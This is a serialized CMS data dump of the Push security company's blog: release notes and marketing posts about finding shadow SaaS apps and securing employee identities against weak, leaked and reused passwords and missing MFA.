",{"items":272789},[272790],{"sys":272791,"name":18399},{"id":18398},{"items":272793},[272794],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":272795},{"url":19129},{"json":272797,"links":272988},{"nodeType":165,"data":272798,"content":272799},{},[272800,272806,272836,272842,272855,272860,272877,272883,272896,272901,272918,272924,272937,272966,272972,272977,272982],{"nodeType":235,"data":272801,"content":272802},{},[272803],{"nodeType":173,"value":220348,"marks":272804,"data":272805},[],{},{"nodeType":250,"data":272807,"content":272808},{},[272809,272818,272827],{"nodeType":254,"data":272810,"content":272811},{},[272812],{"nodeType":178,"data":272813,"content":272814},{},[272815],{"nodeType":173,"value":253661,"marks":272816,"data":272817},[],{},{"nodeType":254,"data":272819,"content":272820},{},[272821],{"nodeType":178,"data":272822,"content":272823},{},[272824],{"nodeType":173,"value":253671,"marks":272825,"data":272826},[],{},{"nodeType":254,"data":272828,"content":272829},{},[272830],{"nodeType":178,"data":272831,"content":272832},{},[272833],{"nodeType":173,"value":253681,"marks":272834,"data":272835},[],{},{"nodeType":235,"data":272837,"content":272838},{},[272839],{"nodeType":173,"value":253688,"marks":272840,"data":272841},[],{},{"nodeType":178,"data":272843,"content":272844},{},[272845,272848,272852],{"nodeType":173,"value":253695,"marks":272846,"data":272847},[],{},{"nodeType":173,"value":253699,"marks":272849,"data":272851},[272850],{"type":370},{},{"nodeType":173,"value":253704,"marks":272853,"data":272854},[],{},{"nodeType":312,"data":272856,"content":272859},{"target":272857},{"sys":272858},{"id":253711,"type":317,"linkType":318},[],{"nodeType":178,"data":272861,"content":272862},{},[272863,272866,272874],{"nodeType":173,"value":37,"marks":272864,"data":272865},[],{},{"nodeType":1698,"data":272867,"content":272870},{"target":272868},{"sys":272869},{"id":248611,"type":317,"linkType":318},[272871],{"nodeType":173,"value":18605,"marks":272872,"data":272873},[],{},{"nodeType":173,"value":37,"marks":272875,"data":272876},[],{},{"nodeType":235,"data":272878,"content":272879},{},[272880],{"nodeType":173,"value":253734,"marks":272881,"data":272882},[],{},{"nodeType":178,"data":272884,"content":272885},{},[272886,272889,272893],{"nodeType":173,"value":253741,"marks":272887,"data":272888},[],{},{"nodeType":173,"value":253745,"marks":272890,"data":272892},[272891],{"type":370},{},{"nodeType":173,"value":253750,"marks":272894,"data":272895},[],{},{"nodeType":312,"data":272897,"content":272900},{"target":272898},{"sys":272899},{"id":253757,"type":317,"linkType":318},[],{"nodeType":178,"data":272902,"content":272903},{},[272904,272907,272915],{"nodeType":173,"value":37,"marks":272905,"data":272906},[],{},{"nodeType":1698,"data":272908,"content":272911},{"target":272909},{"sys":272910},{"id":253769,"type":317,"linkType":318},[272912],{"nodeType":173,"value":148770,"marks":272913,"data":272914},[],{},{"nodeType":173,"value":37,"marks":272916,"data":272917},[],{},{"nodeType":235,"data":272919,"content":272920},{},[272921],{"nodeType":173,"value":253681,"marks":272922,"data":272923},[],{},{"nodeType":178,"data":272925,"content":272926},{},[272927,272930,272934],{"nodeType":173,"value":156608,"marks":272928,"data":272929},[],{},{"nodeType":173,"value":71581,"marks":272931,"data":272933},[272932],{"type":370},{},{"nodeType":173,"value":253794,"marks":272935,"data":272936},[],{},{"nodeType":250,"data":272938,"content":272939},{},[272940,272953],{"nodeType":254,"data":272941,"content":272942},{},[272943],{"nodeType":178,"data":272944,"content":272945},{},[272946,272950],{"nodeType":173,"value":253807,"marks":272947,"data":272949},[272948],{"type":370},{},{"nodeType":173,"value":253812,"marks":272951,"data":272952},[],{},{"nodeType":254,"data":272954,"content":272955},{},[272956],{"nodeType":178,"data":272957,"content":272958},{},[272959,272963],{"nodeType":173,"value":253822,"marks":272960,"data":272962},[272961],{"type":370},{},{"nodeType":173,"value":253827,"marks":272964,"data":272965},[],{},{"nodeType":178,"data":272967,"content":272968},{},[272969],{"nodeType":173,"value":253834,"marks":272970,"data":272971},[],{},{"nodeType":312,"data":272973,"content":272976},{"target":272974},{"sys":272975},{"id":253841,"type":317,"linkType":318},[],{"nodeType":312,"data":272978,"content":272981},{"target":272979},{"sys":272980},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":272983,"content":272984},{},[272985],{"nodeType":173,"value":37,"marks":272986,"data":272987},[],{},{"entries":272989},{"inline":272990,"hyperlink":272991,"block":272999},[],[272992,272994],{"sys":272993,"__typename":6655,"title":254258,"slug":254259,"articleId":254260},{"id":248611},{"sys":272995,"__typename":6655,"title":272996,"slug":272997,"articleId":272998},{"id":253769},"Can I automatically license new employees in Push?","can-i-automatically-license-new-employees-in-push",10098,[273000,273007,273013,273018],{"sys":273001,"__typename":5345,"title":273002,"caption":118,"layoutMode":118,"file":273003},{"id":253711},"Leaked password finding gif - release notes - November 2023",{"url":273004,"width":273005,"height":273006},"https://images.ctfassets.net/y1cdw1ablpvd/1djwdOqniMKtzbxwuJ7Xgk/d5d8a4fca35e6a6380d109758a95912c/leaked-password-demo.gif",800,455,{"sys":273008,"__typename":5345,"title":273009,"caption":118,"layoutMode":118,"file":273010},{"id":253757},"Automatic licensing toggle on Settings - KB 10098",{"url":273011,"width":27934,"height":273012},"https://images.ctfassets.net/y1cdw1ablpvd/5WUVRsiP5xSsaoqBMZ2Y2R/a61d9455c98aa7f5cf74ed7609031761/20251016_licensing_settings.png",750,{"sys":273014,"__typename":5345,"title":273015,"caption":118,"layoutMode":118,"file":273016},{"id":253841},"Accounts filtering demo gif - release notes - November 2023",{"url":273017,"width":273005,"height":273006},"https://images.ctfassets.net/y1cdw1ablpvd/3p3ymD0dD5LjwRZKfBDgc0/f86b8113873da6db244f748e83b9ac68/filtering-demo.gif",{"sys":273019,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},{"items":273021},[273022],{"__typename":1528,"sys":273023,"content":273025,"title":273185,"synopsis":273186,"hashTags":118,"publishedDate":273187,"slug":273188,"tagsCollection":273189,"authorsCollection":273193},{"id":273024},"3jGvJl30Ted1QQl9ctZILN",{"json":273026},{"nodeType":165,"data":273027,"content":273028},{},[273029,273036,273043,273067,273082,273088,273106,273113,273120,273126,273133,273149,273155,273173,273179],{"nodeType":178,"data":273030,"content":273031},{},[273032],{"nodeType":173,"value":273033,"marks":273034,"data":273035},"Here's what’s new on the Push platform this month.",[],{},{"nodeType":235,"data":273037,"content":273038},{},[273039],{"nodeType":173,"value":273040,"marks":273041,"data":273042},"Capture app owner and custom notes",[],{},{"nodeType":178,"data":273044,"content":273045},{},[273046,273050,273054,273058,273063],{"nodeType":173,"value":273047,"marks":273048,"data":273049},"You can now specify an owner for each app in Push to make it simpler to identify who’s responsible when there’s a question or security concern. In the Push admin console, go to ",[],{},{"nodeType":173,"value":71552,"marks":273051,"data":273053},[273052],{"type":370},{},{"nodeType":173,"value":273055,"marks":273056,"data":273057}," and select the app, then use the ",[],{},{"nodeType":173,"value":273059,"marks":273060,"data":273062},"Owner",[273061],{"type":370},{},{"nodeType":173,"value":273064,"marks":273065,"data":273066}," field.",[],{},{"nodeType":178,"data":273068,"content":273069},{},[273070,273074,273079],{"nodeType":173,"value":273071,"marks":273072,"data":273073},"Need to make a few notes about an app, too? You can do that now in a free-form ",[],{},{"nodeType":173,"value":273075,"marks":273076,"data":273078},"Notes",[273077],{"type":370},{},{"nodeType":173,"value":273064,"marks":273080,"data":273081},[],{},{"nodeType":312,"data":273083,"content":273087},{"target":273084},{"sys":273085},{"id":273086,"type":317,"linkType":318},"2M8KkIjMMZ2uxVAeAo3kCO",[],{"nodeType":178,"data":273089,"content":273090},{},[273091,273094,273103],{"nodeType":173,"value":37,"marks":273092,"data":273093},[],{},{"nodeType":1698,"data":273095,"content":273099},{"target":273096},{"sys":273097},{"id":273098,"type":317,"linkType":318},"6MLL6MzTCJajPX9u2cZHE9",[273100],{"nodeType":173,"value":18605,"marks":273101,"data":273102},[],{},{"nodeType":173,"value":37,"marks":273104,"data":273105},[],{},{"nodeType":235,"data":273107,"content":273108},{},[273109],{"nodeType":173,"value":273110,"marks":273111,"data":273112},"Quickly understand a newly added app",[],{},{"nodeType":178,"data":273114,"content":273115},{},[273116],{"nodeType":173,"value":273117,"marks":273118,"data":273119},"Know more about an app that Push has discovered by checking the app description details we’re adding. Get basic context to help you make a decision about an app in your environment.",[],{},{"nodeType":312,"data":273121,"content":273125},{"target":273122},{"sys":273123},{"id":273124,"type":317,"linkType":318},"48OstaOtukGalRD0w9ZzZU",[],{"nodeType":235,"data":273127,"content":273128},{},[273129],{"nodeType":173,"value":273130,"marks":273131,"data":273132},"Hide accounts you don’t want to license",[],{},{"nodeType":178,"data":273134,"content":273135},{},[273136,273140,273145],{"nodeType":173,"value":273137,"marks":273138,"data":273139},"If you’ve got service accounts, test accounts, or others you don’t intend to license in Push, you can now hide them from the ",[],{},{"nodeType":173,"value":273141,"marks":273142,"data":273144},"Unlicensed",[273143],{"type":370},{},{"nodeType":173,"value":273146,"marks":273147,"data":273148}," list in the admin console.",[],{},{"nodeType":312,"data":273150,"content":273154},{"target":273151},{"sys":273152},{"id":273153,"type":317,"linkType":318},"4pmlIOo7KC5IB9r8XCEABj",[],{"nodeType":178,"data":273156,"content":273157},{},[273158,273161,273170],{"nodeType":173,"value":37,"marks":273159,"data":273160},[],{},{"nodeType":1698,"data":273162,"content":273166},{"target":273163},{"sys":273164},{"id":273165,"type":317,"linkType":318},"COmzQqUjFOWEGSzQ5Qi76",[273167],{"nodeType":173,"value":18605,"marks":273168,"data":273169},[],{},{"nodeType":173,"value":37,"marks":273171,"data":273172},[],{},{"nodeType":178,"data":273174,"content":273175},{},[273176],{"nodeType":173,"value":13836,"marks":273177,"data":273178},[],{},{"nodeType":178,"data":273180,"content":273181},{},[273182],{"nodeType":173,"value":37,"marks":273183,"data":273184},[],{},"Product release: September 2023","Here’s what’s new on the Push platform for September 2023.","2023-09-26T00:00:00.000Z","product-release-september-2023",{"items":273190},[273191],{"sys":273192,"name":18399},{"id":18398},{"items":273194},[273195],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":273196},{"url":19129},"content:blog:product-release-november-2023.json","blog/product-release-november-2023.json","blog/product-release-november-2023",{"_path":273201,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":273202,"ogImage":118,"summary":273205,"title":273216,"subtitle":118,"metaTitle":273217,"synopsis":273218,"hashTags":118,"publishedDate":273219,"slug":273220,"tagsCollection":273221,"relatedBlogPostsCollection":273227,"authorsCollection":274168,"content":274172,"_id":274699,"_type":5439,"_source":5440,"_file":274700,"_stem":274701,"_extension":5439},"/blog/third-party-risk-management",{"id":273203,"publishedAt":273204},"6fxxX6Ppu1FW2KARa1GloZ","2026-01-30T09:36:46.724Z",{"json":273206},{"data":273207,"content":273208,"nodeType":165},{},[273209],{"data":273210,"content":273211,"nodeType":178},{},[273212],{"data":273213,"marks":273214,"value":273215,"nodeType":173},{},[],"Third-Party Risk Management (TPRM) is the process of identifying, assessing, and mitigating potential risks associated with third-party relationships, such as suppliers, vendors, service providers, or subcontractors. These external entities play integral roles in a company's operations, making it essential to manage the risks they may introduce.","Understanding Third-Party Risk Management (TPRM): how to protect your organization","What is Third-Party Risk Management","In this article, we define third-party risk management and explore additional approaches that can help manage third-party risk.\n","2023-10-31T00:00:00.000Z","third-party-risk-management",{"items":273222},[273223,273225],{"sys":273224,"name":26137},{"id":26136},{"sys":273226,"name":26133},{"id":26132},{"items":273228},[273229,273637],{"__typename":1528,"sys":273230,"content":273232,"title":273619,"synopsis":273620,"hashTags":118,"publishedDate":273621,"slug":273622,"tagsCollection":273623,"authorsCollection":273629},{"id":273231},"6DXY81om8HSVmh3q7YRNfl",{"json":273233},{"nodeType":165,"data":273234,"content":273235},{},[273236,273242,273249,273256,273263,273271,273278,273285,273292,273297,273304,273311,273318,273325,273331,273338,273345,273351,273358,273365,273372,273382,273389,273408,273461,273467,273474,273481,273487,273494,273501,273519,273525,273532,273555,273562,273568,273576,273583,273589,273601,273608,273613],{"nodeType":169,"data":273237,"content":273238},{},[273239],{"nodeType":173,"value":258287,"marks":273240,"data":273241},[],{},{"nodeType":178,"data":273243,"content":273244},{},[273245],{"nodeType":173,"value":273246,"marks":273247,"data":273248},"SaaS vendors have changed how software is adopted into a business. Now, the majority of SaaS vendors use a product-led growth model - which simply means they want users (your employees) to self-adopt their apps, start using them (with real data), and become a useful tool for the employee. ",[],{},{"nodeType":178,"data":273250,"content":273251},{},[273252],{"nodeType":173,"value":273253,"marks":273254,"data":273255},"Vendors want to bypass the security and IT software-onboarding processes we’d all gotten used to in the past. They know if they prove their tool is valuable with the user from the start, it’s much easier and quicker for them to gain traction and customers than it was waiting for security and IT teams to audit (and potentially refuse) their software.",[],{},{"nodeType":178,"data":273257,"content":273258},{},[273259],{"nodeType":173,"value":273260,"marks":273261,"data":273262},"The result of this...",[],{},{"nodeType":178,"data":273264,"content":273265},{},[273266],{"nodeType":173,"value":273267,"marks":273268,"data":273270},"Employees are self-adopting SaaS apps and creating new cloud identities on their own, without IT approval",[273269],{"type":370},{},{"nodeType":178,"data":273272,"content":273273},{},[273274],{"nodeType":173,"value":273275,"marks":273276,"data":273277},"This self-adoption has turned the product-adoption process on its head - leaving security and IT teams blind to which apps sensitive company data is flowing into.",[],{},{"nodeType":178,"data":273279,"content":273280},{},[273281],{"nodeType":173,"value":273282,"marks":273283,"data":273284},"Now that IT and security have to not only find these accounts, identities and apps, but keep sensitive corporate data secure across all cloud services, where do you start? ",[],{},{"nodeType":178,"data":273286,"content":273287},{},[273288],{"nodeType":173,"value":273289,"marks":273290,"data":273291},"You could consider a solution like Push, which has built-in features to find and secure identities your employees have created and guide them to harden their accounts against attacks.",[],{},{"nodeType":312,"data":273293,"content":273296},{"target":273294},{"sys":273295},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":273298,"content":273299},{},[273300],{"nodeType":173,"value":273301,"marks":273302,"data":273303},"Push gives you complete visibility, helps you identify risks, and works with employees to secure accounts ",[],{},{"nodeType":178,"data":273305,"content":273306},{},[273307],{"nodeType":173,"value":273308,"marks":273309,"data":273310},"It probably won’t come as a surprise to find out that we’ve designed Push so security teams can get a handle on employee-adopted SaaS apps without needing to block them.",[],{},{"nodeType":235,"data":273312,"content":273313},{},[273314],{"nodeType":173,"value":273315,"marks":273316,"data":273317},"1. Get visibility of shadow SaaS apps and shadow identities",[],{},{"nodeType":178,"data":273319,"content":273320},{},[273321],{"nodeType":173,"value":273322,"marks":273323,"data":273324},"If you’re going to get a handle on employee-adopted SaaS apps, you need to get visibility \nof them first. Push uses data from our browser extension to find SaaS apps that employees sign  into with usernames and passwords and SSO (OIDC). This gives you complete visibility of your SaaS environment, including shadow SaaS apps and cloud accounts that are not managed by IT. ",[],{},{"nodeType":312,"data":273326,"content":273330},{"target":273327},{"sys":273328},{"id":273329,"type":317,"linkType":318},"64S2LPmlKfXD924iZaRMc6",[],{"nodeType":235,"data":273332,"content":273333},{},[273334],{"nodeType":173,"value":273335,"marks":273336,"data":273337},"2. Detect the new apps, integrations and identities in real time",[],{},{"nodeType":178,"data":273339,"content":273340},{},[273341],{"nodeType":173,"value":273342,"marks":273343,"data":273344},"Push detects employees signing up to new apps, or integrating third-party apps to your core work platforms in real-time. That allows you to step in at the earliest opportunity to check out the app and guide the employee through the appropriate app onboarding steps. ",[],{},{"nodeType":312,"data":273346,"content":273350},{"target":273347},{"sys":273348},{"id":273349,"type":317,"linkType":318},"3XcJ9NQtRq7jUt5iAuxZMt",[],{"nodeType":235,"data":273352,"content":273353},{},[273354],{"nodeType":173,"value":273355,"marks":273356,"data":273357},"3. Avoid wasting time on false-positives",[],{},{"nodeType":178,"data":273359,"content":273360},{},[273361],{"nodeType":173,"value":273362,"marks":273363,"data":273364},"You need to trust your data if you want to take action to manage risks. Email and network data all infers SaaS usage from indicators such as emails from vendors and website visits. But as you can imagine, that won’t always point to usage, and so false positives are inevitable. Doing risk assessments or chasing employees about apps employees are not actually using wastes time and burns goodwill. ",[],{},{"nodeType":178,"data":273366,"content":273367},{},[273368],{"nodeType":173,"value":273369,"marks":273370,"data":273371},"Push uses a browser extension to accurately identify the SaaS apps employees are using and any security issues that attackers can exploit to compromise your data through common attacks like credential stuffing and brute forcing. ",[],{},{"nodeType":3769,"data":273373,"content":273374},{},[273375],{"nodeType":178,"data":273376,"content":273377},{},[273378],{"nodeType":173,"value":273379,"marks":273380,"data":273381},"Push is the only identity security solution that can directly observe all SaaS use and detect account vulnerabilities - completely automatically. No need for API support, no need for an admin account. It just works.",[],{},{"nodeType":235,"data":273383,"content":273384},{},[273385],{"nodeType":173,"value":273386,"marks":273387,"data":273388},"4. Identify account security risks and discover shadow SaaS at the same time",[],{},{"nodeType":178,"data":273390,"content":273391},{},[273392,273396,273404],{"nodeType":173,"value":273393,"marks":273394,"data":273395},"Supply chain risk is important, but we’d argue the risk of identity-based attacks are greater for most organizations. 49% of the incidents in the 2023 Verizon DBIR involved credentials, and Crowdstrike have reported that 80% of the attacks they detected ",[],{},{"nodeType":186,"data":273397,"content":273399},{"uri":273398},"https://www.crowdstrike.com/cybersecurity-101/identity-security/identity-based-attacks/",[273400],{"nodeType":173,"value":273401,"marks":273402,"data":273403},"used identity-based attack techniques",[],{},{"nodeType":173,"value":273405,"marks":273406,"data":273407},". Push can identify account security issues that make it possible for attackers to compromise your employees accounts using credential stuffing, brute forcing and consent phishing attacks. These include:",[],{},{"nodeType":250,"data":273409,"content":273410},{},[273411,273421,273431,273441,273451],{"nodeType":254,"data":273412,"content":273413},{},[273414],{"nodeType":178,"data":273415,"content":273416},{},[273417],{"nodeType":173,"value":273418,"marks":273419,"data":273420},"Compromised passwords",[],{},{"nodeType":254,"data":273422,"content":273423},{},[273424],{"nodeType":178,"data":273425,"content":273426},{},[273427],{"nodeType":173,"value":273428,"marks":273429,"data":273430},"Guessable passwords (and not using a password manager for storing complex passwords)",[],{},{"nodeType":254,"data":273432,"content":273433},{},[273434],{"nodeType":178,"data":273435,"content":273436},{},[273437],{"nodeType":173,"value":273438,"marks":273439,"data":273440},"Account-sharing between multiple employees",[],{},{"nodeType":254,"data":273442,"content":273443},{},[273444],{"nodeType":178,"data":273445,"content":273446},{},[273447],{"nodeType":173,"value":273448,"marks":273449,"data":273450},"Reusing passwords across multiple accounts",[],{},{"nodeType":254,"data":273452,"content":273453},{},[273454],{"nodeType":178,"data":273455,"content":273456},{},[273457],{"nodeType":173,"value":273458,"marks":273459,"data":273460},"Missing MFA",[],{},{"nodeType":312,"data":273462,"content":273466},{"target":273463},{"sys":273464},{"id":273465,"type":317,"linkType":318},"3y9oXd2vV1IGL0ci97qXz1",[],{"nodeType":178,"data":273468,"content":273469},{},[273470],{"nodeType":173,"value":273471,"marks":273472,"data":273473},"We identify these issues at the same time we discover shadow SaaS apps, so you can tackle identity-based attack risks at the same time as supply chain risk to reduce your overall risk exposure faster.",[],{},{"nodeType":178,"data":273475,"content":273476},{},[273477],{"nodeType":173,"value":273478,"marks":273479,"data":273480},"Push can help you reduce these risks by engaging employees directly via Slack or MS Teams, explain the account security issue we’ve identified in a way they’ll understand, and guide them on how to fix it.",[],{},{"nodeType":312,"data":273482,"content":273486},{"target":273483},{"sys":273484},{"id":273485,"type":317,"linkType":318},"2ff4hEKJ1CqKjPMaVPTxHp",[],{"nodeType":235,"data":273488,"content":273489},{},[273490],{"nodeType":173,"value":273491,"marks":273492,"data":273493},"5. Use Push to secure accounts that aren’t behind SSO",[],{},{"nodeType":178,"data":273495,"content":273496},{},[273497],{"nodeType":173,"value":273498,"marks":273499,"data":273500},"In an ideal world, you could stick all your SaaS apps and accounts behind your SSO solution. With SAML SSO, there’s just one identity, just one password, and you can centrally deprovision accounts when employees leave the organization. You’re probably already paying for a SAML IdP (Identity Provider) like Google Directory or Azure AD. Many others are using tools like Okta.",[],{},{"nodeType":178,"data":273502,"content":273503},{},[273504,273508,273516],{"nodeType":173,"value":273505,"marks":273506,"data":273507},"Unfortunately,  ",[],{},{"nodeType":186,"data":273509,"content":273510},{"uri":182804},[273511],{"nodeType":173,"value":273512,"marks":273513,"data":273515},"SSO is only available on around 31% of work apps we explored",[273514],{"type":194},{},{"nodeType":173,"value":197,"marks":273517,"data":273518},[],{},{"nodeType":312,"data":273520,"content":273524},{"target":273521},{"sys":273522},{"id":273523,"type":317,"linkType":318},"73E93otbLKilAM2U48WRho",[],{"nodeType":178,"data":273526,"content":273527},{},[273528],{"nodeType":173,"value":273529,"marks":273530,"data":273531},"So, with SSO unavailable for most apps, you can rely on Push to ensure strong access controls on non-SSO accounts, things like: ",[],{},{"nodeType":250,"data":273533,"content":273534},{},[273535,273545],{"nodeType":254,"data":273536,"content":273537},{},[273538],{"nodeType":178,"data":273539,"content":273540},{},[273541],{"nodeType":173,"value":273542,"marks":273543,"data":273544},"using strong, unique passwords, and",[],{},{"nodeType":254,"data":273546,"content":273547},{},[273548],{"nodeType":178,"data":273549,"content":273550},{},[273551],{"nodeType":173,"value":273552,"marks":273553,"data":273554},"utilizing multi factor authentication (MFA). ",[],{},{"nodeType":178,"data":273556,"content":273557},{},[273558],{"nodeType":173,"value":273559,"marks":273560,"data":273561},"These authentication controls, when used in conjunction with one another,  are very effective in protecting SaaS accounts from identity-based attack techniques. When Push detects that these controls are not in place, we automatically engage users via Slack or Teams and guide them to fix the issues.",[],{},{"nodeType":312,"data":273563,"content":273567},{"target":273564},{"sys":273565},{"id":273566,"type":317,"linkType":318},"6b8N3UOfciGnDBu78I1I2i",[],{"nodeType":178,"data":273569,"content":273570},{},[273571],{"nodeType":173,"value":273572,"marks":273573,"data":273575},"Prevent new identity vulnerabilities being created",[273574],{"type":370},{},{"nodeType":178,"data":273577,"content":273578},{},[273579],{"nodeType":173,"value":273580,"marks":273581,"data":273582},"Once you’ve been able to fix the security issues on all your existing cloud accounts, you want to make sure that new vulnerabilities don’t creep back in.. When Push detects an employee creating a new account in their browser, we’ll guide them \nto set up strong access controls on their account. ",[],{},{"nodeType":312,"data":273584,"content":273588},{"target":273585},{"sys":273586},{"id":273587,"type":317,"linkType":318},"PUluIhvb6a498j1lD5W6N",[],{"nodeType":235,"data":273590,"content":273591},{},[273592,273596],{"nodeType":173,"value":273593,"marks":273594,"data":273595},"\n6. Get a handle on employee-adopted apps ",[],{},{"nodeType":173,"value":273597,"marks":273598,"data":273600},"without being a blocker",[273599],{"type":1646},{},{"nodeType":178,"data":273602,"content":273603},{},[273604],{"nodeType":173,"value":273605,"marks":273606,"data":273607},"By using Push, you gain complete visibility of all SaaS apps in your environment, including those adopted by employees without the oversight of IT and Security. We’ll automatically find the security issues that put your data at risk and guide employees to fix them. This allows you to embrace app self-adoption and adopt a default allow approach that enables your business while scaling security so you don’t lose control of SaaS security risks.  ",[],{},{"nodeType":312,"data":273609,"content":273612},{"target":273610},{"sys":273611},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":273614,"content":273615},{},[273616],{"nodeType":173,"value":37,"marks":273617,"data":273618},[],{},"6 ways to manage third-party access to your data with Push","Employees are self-adopting SaaS apps and creating new cloud identities without IT approval. Learn how to manage which third parties have access to your data.\n","2023-10-11T00:00:00.000Z","manage-third-party-data-access",{"items":273624},[273625,273627],{"sys":273626,"name":26137},{"id":26136},{"sys":273628,"name":26133},{"id":26132},{"items":273630},[273631],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":273635},"Sally Soulliere","Sally","Head of Brand & Content",{"url":273636},"https://images.ctfassets.net/y1cdw1ablpvd/7Gh4SbbEj6Zsbd6OzGto8Q/885041a4ddeccc5ef3045c0e22975ef4/T016S22KZ96-U036FPETQRH-330f87708d26-192.jpeg",{"__typename":1528,"sys":273638,"content":273640,"title":274148,"synopsis":274149,"hashTags":118,"publishedDate":274150,"slug":274151,"tagsCollection":274152,"authorsCollection":274160},{"id":273639},"1I9skXuLjbdjnc6rAVkaS3",{"json":273641},{"nodeType":165,"data":273642,"content":273643},{},[273644,273650,273657,273664,273671,273678,273703,273715,273737,273744,273751,273766,273773,273780,273787,273794,273801,273808,273814,273821,273899,273906,273912,273919,273926,273947,273954,273961,273984,274005,274012,274019,274052,274058,274065,274085,274092,274099,274121,274127,274134,274141],{"nodeType":169,"data":273645,"content":273646},{},[273647],{"nodeType":173,"value":258287,"marks":273648,"data":273649},[],{},{"nodeType":178,"data":273651,"content":273652},{},[273653],{"nodeType":173,"value":273654,"marks":273655,"data":273656},"Employees are signing up to cloud apps on their own every day in their organizations. When they sign up with a password, they have created a new account and a new identity on that app. ",[],{},{"nodeType":178,"data":273658,"content":273659},{},[273660],{"nodeType":173,"value":273661,"marks":273662,"data":273663},"Why both? If they had instead clicked on “Signup with Google,” they would have created a new account, but would have been using their Google identity that already exists. ",[],{},{"nodeType":235,"data":273665,"content":273666},{},[273667],{"nodeType":173,"value":273668,"marks":273669,"data":273670},"Types of identities",[],{},{"nodeType":178,"data":273672,"content":273673},{},[273674],{"nodeType":173,"value":273675,"marks":273676,"data":273677},"This informally introduces the concept of an identity provider - a place that stores primary identity information (including email address, password and other profile information).",[],{},{"nodeType":178,"data":273679,"content":273680},{},[273681,273685,273690,273694,273699],{"nodeType":173,"value":273682,"marks":273683,"data":273684},"When someone creates a new account with a password, a new ",[],{},{"nodeType":173,"value":273686,"marks":273687,"data":273689},"local identity",[273688],{"type":1646},{},{"nodeType":173,"value":273691,"marks":273692,"data":273693}," has been created. In contrast, they probably use a ",[],{},{"nodeType":173,"value":273695,"marks":273696,"data":273698},"centralized identity",[273697],{"type":1646},{},{"nodeType":173,"value":273700,"marks":273701,"data":273702}," to access business email and other core business apps. This means that the number of accounts and number of identities that an employee has are probably different.",[],{},{"nodeType":178,"data":273704,"content":273705},{},[273706,273711],{"nodeType":173,"value":273707,"marks":273708,"data":273710},"Local identities",[273709],{"type":1646},{},{"nodeType":173,"value":273712,"marks":273713,"data":273714}," are often unknown by security/IT teams as there are no easy observation points for them. These local identities, which employees create to sign up for new tools that help them with their job, can also open the door to potential breaches if not secured properly. ",[],{},{"nodeType":178,"data":273716,"content":273717},{},[273718,273722,273733],{"nodeType":173,"value":273719,"marks":273720,"data":273721},"In the ",[],{},{"nodeType":1698,"data":273723,"content":273727},{"target":273724},{"sys":273725},{"id":273726,"type":317,"linkType":318},"3eCWNBg1avThJNsZSwaq1y",[273728],{"nodeType":173,"value":273729,"marks":273730,"data":273732},"shared responsibility model",[273731],{"type":194},{},{"nodeType":173,"value":273734,"marks":273735,"data":273736}," of cloud security, most apps only require that organizations secure user accounts and the vendor takes care of the rest. But how do security teams secure identities that they don’t even know about? ",[],{},{"nodeType":178,"data":273738,"content":273739},{},[273740],{"nodeType":173,"value":273741,"marks":273742,"data":273743},"In this blog post, we'll delve into the world of shadow identities and how security teams can find and secure them.",[],{},{"nodeType":169,"data":273745,"content":273746},{},[273747],{"nodeType":173,"value":273748,"marks":273749,"data":273750},"What is a shadow identity? ",[],{},{"nodeType":178,"data":273752,"content":273753},{},[273754,273758,273762],{"nodeType":173,"value":273755,"marks":273756,"data":273757},"A shadow identity",[],{},{"nodeType":173,"value":3107,"marks":273759,"data":273761},[273760],{"type":370},{},{"nodeType":173,"value":273763,"marks":273764,"data":273765},"is an identity a security/IT team is not aware of. Most often (but not exclusively) these exist outside IT-managed identity providers as local accounts on SaaS apps. ",[],{},{"nodeType":178,"data":273767,"content":273768},{},[273769],{"nodeType":173,"value":273770,"marks":273771,"data":273772},"These shadow identities introduce risk to the organization. However, once an organization’s security/IT function has visibility of an identity on an ongoing basis it is no-longer a \"shadow identity,\" and becomes just a normal identity - even if it’s on a third-party app.",[],{},{"nodeType":235,"data":273774,"content":273775},{},[273776],{"nodeType":173,"value":273777,"marks":273778,"data":273779},"Where do centralized identities fit in? ",[],{},{"nodeType":178,"data":273781,"content":273782},{},[273783],{"nodeType":173,"value":273784,"marks":273785,"data":273786},"Most organizations have a central identity provider (e.g. AzureAD/Google Directory/Okta) that stores login credentials and profile information for each employee. Most organizations strive to connect their identity provider (IdP) to all the apps they use. ",[],{},{"nodeType":178,"data":273788,"content":273789},{},[273790],{"nodeType":173,"value":273791,"marks":273792,"data":273793},"It’s a noble goal because it allows efforts to be focused on securing only a single set of credentials and MFA per employee. However, the reality is that this isn’t practical and there are many reasons why each employee only having only a single identity is only a dream (it’s a good one though!). More on this later.",[],{},{"nodeType":169,"data":273795,"content":273796},{},[273797],{"nodeType":173,"value":273798,"marks":273799,"data":273800},"Understanding shadow identity security risks",[],{},{"nodeType":178,"data":273802,"content":273803},{},[273804],{"nodeType":173,"value":273805,"marks":273806,"data":273807},"Since shadow identities (or shadow cloud identities) cannot get the same level of security attention as IT-managed identities because they’re unknown, they’re usually not as tightly secured as other identities in the business. ",[],{},{"nodeType":312,"data":273809,"content":273813},{"target":273810},{"sys":273811},{"id":273812,"type":317,"linkType":318},"35WMjPHXP2v0qtEaUMIBAS",[],{"nodeType":178,"data":273815,"content":273816},{},[273817],{"nodeType":173,"value":273818,"marks":273819,"data":273820},"Common security risks in shadow identities:",[],{},{"nodeType":250,"data":273822,"content":273823},{},[273824,273839,273854,273869,273884],{"nodeType":254,"data":273825,"content":273826},{},[273827],{"nodeType":178,"data":273828,"content":273829},{},[273830,273835],{"nodeType":173,"value":273831,"marks":273832,"data":273834},"Weak password",[273833],{"type":370},{},{"nodeType":173,"value":273836,"marks":273837,"data":273838}," - they could be using a really basic password like the person’s name or some other dictionary word (or some combination that gets accepted by the complexity checks on the app e.g. Password1!).",[],{},{"nodeType":254,"data":273840,"content":273841},{},[273842],{"nodeType":178,"data":273843,"content":273844},{},[273845,273850],{"nodeType":173,"value":273846,"marks":273847,"data":273849},"Leaked password",[273848],{"type":370},{},{"nodeType":173,"value":273851,"marks":273852,"data":273853}," - the password used has been leaked in a 